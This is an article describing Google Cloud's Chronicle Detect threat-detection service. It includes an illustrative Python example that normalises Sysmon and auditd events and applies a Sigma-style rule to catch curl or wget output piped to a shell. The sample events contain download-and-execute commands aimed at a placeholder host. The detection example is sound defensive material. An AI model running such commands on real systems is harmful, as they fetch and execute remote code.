Google Cloud has been proactively working to secure its own perimeter while providing its customers with a range of solutions that help them strengthen theirs. It all began with the acquisition of “Chronicle” in October 2019. Nine months later, it followed up with a partnership with Tanium that integrated Tanium’s high-fidelity, real-time security telemetry with Google Cloud Chronicle’s analytics and cloud-scale data capacity. This made instant search and cyber forensics capability a reality for its customers. Following on from this, with growing volumes of new threat vectors arriving every day and with the shortfalls of legacy security solutions, Google has now launched a new-age solution for new-age threats: Chronicle Detect.
In legacy systems it is often difficult to run multiple rules in parallel and at scale, which creates latency in response even when a threat is detected. Add to this that the majority of analytics tools use a data query language for writing detection rules, which adds to the burden of the person writing them in the first place. Finally, early detection depends on proactive threat intelligence about attacker activity, which many vendors lack. As a result, legacy security tools are unable to detect most modern-day threats.
Chronicle Detect as a Solution
To address these concerns, Google Cloud announced Chronicle Detect, a threat detection solution built on the capabilities of Google’s security infrastructure to help enterprises identify threats at high speed and at scale. Chronicle Detect has a data fusion model that pieces all events into a unified timeline, a rules engine to handle common events, and a language for describing complex threat behaviors.
Chronicle Detect has a next-generation rules engine that operates at the speed of search, with a regular stream of new rules and indicators added by Chronicle’s internal research team. It is easier for enterprises to move from legacy security tools to a modern threat detection system like Chronicle Detect because security teams can send their security telemetry to Chronicle at a fixed cost, so that diverse, high-value security data can be taken into account for detections. This security data is then made useful by mapping it to a common data model across machines, users, and threat indicators, so that users can quickly apply powerful detection rules to a unified set of data.
The rules engine makes use of one of the most flexible and widely used detection languages, YARA. This eases the pressure of writing rules for the detection of tactics and techniques found in the commonly used MITRE ATT&CK security framework. Additionally, many organizations are integrating Sigma-based rules across systems or converting their legacy rules to Sigma for portability. Chronicle Detect therefore includes a Sigma-YARA converter, which allows rules to be ported to and from the platform.
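The two ideas in the preceding paragraphs, mapping telemetry from different sources onto one common data model and then applying a portable Sigma-style rule to it, can be illustrated with a small worked example. The code below is an added illustration, not Chronicle’s code or schema: the common-model field names (process.name, process.command_line, user.name), the rule and the raw events are all constructed for this example.

```python
import fnmatch
# Constructed Sigma rule in parsed (dict) form; the common-model field names
# (process.name, ...) are assumptions for illustration, not Chronicle's schema.
RULE = {
    "tags": ["attack.execution", "attack.t1059"],
    "detection": {
        "selection": {"process.name|endswith": ["curl", "curl.exe", "wget"],
                      "process.command_line|contains": "| sh"},
        "filter": {"user.name": "backup-svc"},
        "condition": "selection and not filter",
    },
}
# Constructed raw events from two sources, each with its own native field names.
EVENTS = [
    {"source": "sysmon", "Image": "C:\\Tools\\curl.exe", "User": "CORP\\alice",
     "CommandLine": "curl.exe http://example.invalid/a | sh"},
    {"source": "auditd", "exe": "/usr/bin/wget", "auid_name": "backup-svc",
     "proctitle": "wget -qO- http://example.invalid/b | sh"},
    {"source": "auditd", "exe": "/usr/bin/ls", "auid_name": "bob", "proctitle": "ls -la"},
]
FIELD_MAP = {  # source -> common field -> native field: the data-model mapping step
    "sysmon": {"process.name": "Image", "process.command_line": "CommandLine", "user.name": "User"},
    "auditd": {"process.name": "exe", "process.command_line": "proctitle", "user.name": "auid_name"},
}

def normalize(raw):
    """Translate one raw event into the common model; process.name keeps only the basename."""
    event = {common: raw[native] for common, native in FIELD_MAP[raw["source"]].items()}
    event["process.name"] = event["process.name"].replace("\\", "/").rsplit("/", 1)[-1]
    return event

def _field_matches(key, expected, event):
    """One Sigma field test: list values are OR-ed, matching is case-insensitive."""
    field, _, mod = key.partition("|")
    value = str(event.get(field, "")).lower()
    for exp in (expected if isinstance(expected, list) else [expected]):
        exp = str(exp).lower()
        if ((mod == "contains" and exp in value) or (mod == "endswith" and value.endswith(exp))
                or (mod == "" and fnmatch.fnmatchcase(value, exp))):
            return True
    return False

def matches(rule, event):
    """Evaluate the common 'X and not Y' condition shape; every field in a block must match."""
    det = rule["detection"]
    hit = {n: all(_field_matches(k, v, event) for k, v in b.items())
           for n, b in det.items() if n != "condition"}
    pos, _, neg = det["condition"].partition(" and not ")
    return hit[pos] and not (neg and hit[neg])
def detect(raw_events):
    """Return the indices of raw events that trigger RULE once normalized."""
    return [i for i, raw in enumerate(raw_events) if matches(RULE, normalize(raw))]
```

Only the first event fires: the second is suppressed by the rule’s filter block, and the third matches no selection field. Real Sigma conditions can be far richer (aggregations, arbitrary boolean expressions), which is exactly why a dedicated converter is needed in practice.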
Chronicle Detect integrates with Uppercase as well. Uppercase acts as a directory that provides IOCs, indicators of APTs, and other information related to cybercriminal activity. This is an added benefit for the platform’s customers, who can take advantage of its detection rules and threat indicators.
In Google’s own words, this is just the beginning of things to come. With threat actors evolving their techniques every day, Google plans to counter them with an expanded suite of security solutions for its customers.